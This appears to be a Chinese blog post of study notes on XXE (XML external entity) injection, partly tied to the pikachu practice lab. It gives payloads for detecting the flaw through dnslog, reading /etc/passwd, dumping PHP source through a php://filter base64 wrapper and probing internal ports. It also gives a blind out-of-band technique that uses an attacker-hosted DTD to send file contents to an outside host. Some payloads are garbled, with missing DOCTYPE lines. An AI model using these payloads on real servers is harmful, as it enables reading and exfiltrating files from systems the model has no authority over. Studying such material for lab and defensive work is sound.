XXE

直接对服务器进行攻击的手段,XML外部(DTD)实体注入(XML文档,一种标签语言,作用是将数据,运行部分程序,对象,转换为xml格式存放,在别处调用时继续使用。有漏洞,可以写xml格式恶意代码让服务器执行。)
xml主要分为三部分

<?xml version=‘1.0’ encoding='utf-8'(版本,编码) ?> >

%aaa;
]>

抓包,增加以上代码,http地址写上dnslog.cn的地址
然年forward,刷新dnslog,有回应,有xxe漏洞。
在这里插入图片描述

xxe文件读取:

假如查passwd:

在这里插入图片描述
抓包

在这里插入图片描述
改为post(get也可以)
在这里插入图片描述

加入

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

&xxe;

放包。
在这里插入图片描述

爆当前页面源码:
需要base64编码。改动实体的值即可

“php://filter/read=convert.base64-encode/resource=index.php”

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">

]>
&xxe;

之后

在这里插入图片描述

将64码解码即可。

pikachu xxe:

<?xml version = "1.0"?> <!ENTITY f SYSTEM "file:///www/wwwroot/pikachu-master/liukun.txt">

]>&f;

<!ENTITY hacker "ESHLkangi">

内网端口探测,应用程序攻击:

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "http://120.78.92.198:8030">

]>
&xxe;

端口如果存在,回显会很快,若不存在,则回显很慢或者无回显。

二:

<?xml version="1.0"?>

]>
&test;Mikasa
截取回包,即可获得在这里插入图片描述
的文件内容
在这里插入图片描述

如果没有回显:
只告诉结果,不报错时怎么办:
搭建网站新建dtd文件放在目录下,(在黑客自己的网站)编辑内容为

<!ENTITY % payload “<!ENTITY % send SYSTEM 'http://127.0.0.1/?cpn=%ttt;'>">

%payload;

引用dtd文件:

<?xml version="1.0"?> <!ENTITY % dtd SYSTEM "http://192.168.0.47/aaa.dtd">

%dtd;
%send;
]>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值